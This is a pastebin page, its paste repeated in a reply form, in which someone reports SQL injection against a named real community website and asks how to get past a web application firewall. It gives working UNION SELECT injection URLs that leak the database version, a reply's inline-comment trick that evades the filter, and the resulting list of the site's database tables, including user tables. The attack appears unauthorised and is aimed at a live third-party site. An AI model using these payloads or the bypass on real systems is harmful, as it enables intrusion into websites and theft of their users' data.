Re: SQLI Please Help [406 Not Ac

From Anonymous, 3 Years ago, written in Plain Text, viewed 62 times. This paste is a reply to SQLI Please Help [406 Not Accept from Words Suck - view diff

URL https://paste.bugabuse.net/view/33657451 Embed

Download Paste or View Raw

I've been practicing SQLI..
 
I found this one site:
http://www.scouttalk.ie
 
I know it is injectable because when I get to here
http://www.scouttalk.ie/clan.php?orgID=null UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22--
 
I get the database name: 5.1.63-cll
 
However when I go further:
http://www.scouttalk.ie/clan.php?orgID=null UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(table_name),18,19,20,21,22 from information_schema.tables where table_schema=database()--
 
I get a 406 NOT ACCEPTABLE error.
 
I know I'm most likely being blocked due to my injection method, I've tried things such as adding comment tags etc, googled around but I'm stuck.
 
Can someone please help me bypass this so I can get further?
 
http://www.scouttalk.ie/clan.php?orgID=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(/*!table_name*/),18,19,20,21,22 from information_schema.tables where table_schema=database() --
 
^^^ above by warb0 --- this would bypass it :D
 
tables in db:
IPlog
allunitslist
article
articlecomment
badges
clanforum
clannews
countryforum
countrynews
event
eventcomment
game
gamecomment
globalforum
globallibrary
globalnews
journal
journalcomment
listing
listingcomment
messaging
newclan
orders
org
orgcomment
patrolforum
patrolnews
photo
photocomment
poll
pollcomment
radio
radiocomment
ranklist
recommended
regionforum
regionnews
sectionforum
sectionnews
stickit
talkbox
talkboxreplies
temp
tips
unitforum
unitnews
user
useralert
userdesc
userinfo
userstatus
visitor
 

Reply to "Re: SQLI Please Help [406 Not Ac"

Here you can reply to the paste above

Author What's your name?

Title Give your paste a title.

Language What language is your paste written in?

Your paste Paste your paste here

I've been practicing SQLI..

I found this one site:
http://www.scouttalk.ie

I know it is injectable because when I get to here
http://www.scouttalk.ie/clan.php?orgID=null UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22--

I get the database name: 5.1.63-cll

However when I go further:
http://www.scouttalk.ie/clan.php?orgID=null UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(table_name),18,19,20,21,22 from information_schema.tables where table_schema=database()--

I get a 406 NOT ACCEPTABLE error.

I know I'm most likely being blocked due to my injection method, I've tried things such as adding comment tags etc, googled around but I'm stuck.

Can someone please help me bypass this so I can get further?

http://www.scouttalk.ie/clan.php?orgID=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(/*!table_name*/),18,19,20,21,22 from information_schema.tables where table_schema=database() --

^^^ above by warb0 --- this would bypass it :D

tables in db:
IPlog
allunitslist
article
articlecomment
badges
clanforum
clannews
countryforum
countrynews
event
eventcomment
game
gamecomment
globalforum
globallibrary
globalnews
journal
journalcomment
listing
listingcomment
messaging
newclan
orders
org
orgcomment
patrolforum
patrolnews
photo
photocomment
poll
pollcomment
radio
radiocomment
ranklist
recommended
regionforum
regionnews
sectionforum
sectionnews
stickit
talkbox
talkboxreplies
temp
tips
unitforum
unitnews
user
useralert
userdesc
userinfo
userstatus
visitor

Create Shorturl Create a shorter url that redirects to your paste?

Private Private paste aren't shown in recent listings.

Delete After When should we delete your paste?

Bugabuse.Net Pastebin

Re: SQLI Please Help [406 Not Ac

Reply to "Re: SQLI Please Help [406 Not Ac"